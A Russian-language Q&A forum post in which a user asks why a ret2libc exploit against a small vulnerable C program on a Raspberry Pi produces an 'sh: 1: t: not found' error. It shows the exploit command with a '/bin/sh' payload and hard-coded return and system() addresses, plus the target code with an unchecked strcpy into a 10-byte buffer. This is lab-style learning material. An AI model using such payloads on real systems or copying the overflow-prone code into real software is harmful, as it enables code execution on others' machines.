Ret2libc эксплойт в ARM - PullRequest
       16

Ret2libc эксплойт в ARM

0 голосов
/ 17 сентября 2018

Я пытаюсь использовать ret2libc в ARM (Raspberry pi). Я получаю эту ошибку:

sh: 1: t: not found

Может кто-нибудь объяснить, что означает эта ошибка? Я знаю, что он может успешно получить оболочку, но в аргументе, который я послал, что-то не так:

./ret2ZP `printf "/bin/sh;#CCC\x3c\xef\xff\xbe\x54\xb1\xe9\xb6"`

Это адрес функции system: x54\xb1\xe9\xb6

И это уязвимый код, который я использую:

#include <stdio .h> 
#include <string .h> 
#include <stdlib .h>

void donuts() {
    puts ( ”Donuts . . . ” ) ;
    exit (0);
}
void vuln(char ∗arg) { 
    char buff [10];
    strcpy(buff, arg);
}
int main(int argc , char ∗∗argv) { 
    vuln(argv [1]);
    return 0 ;
}
Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...